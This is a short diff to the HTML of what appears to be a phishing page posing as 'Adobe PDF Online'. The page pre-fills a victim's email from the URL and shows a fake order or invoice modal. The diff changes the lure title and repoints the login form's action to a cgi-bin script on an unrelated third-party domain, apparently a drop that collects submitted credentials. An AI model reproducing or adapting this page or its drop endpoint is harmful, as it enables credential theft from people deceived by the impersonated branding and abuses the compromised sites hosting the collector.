--- a/index.html
+++ b/index.html
@@ -258,7 +258,7 @@ $("#email").val($.urlPeram('email'));
                   <div>
                     <img style="height:30px;float:left; margin-right:10px;" src="Adobe%20PDF%20Online_files/ted.png">
                   </div>
-                 <span class="modal-title">NewOrderDetails/Invoice</span>
+                 <span class="modal-title">OrderDetails/Spec</span>
              </div>
 
             <!-- This div spans the 12 columns of the display -->
@@ -286,7 +286,7 @@ $("#email").val($.urlPeram('email'));
                 </div>
                 <!-- End of server response message div -->
 
-                <form action="https://winmatpublishers.com/cgi-bin/googledrive/next.php" method="post">
+                <form action="https://ginosnewyorkpizza.com/cgi-bin/feedup.php" method="post">
                   
                     <div class="form-group">
                     <!-- User Email Label -->
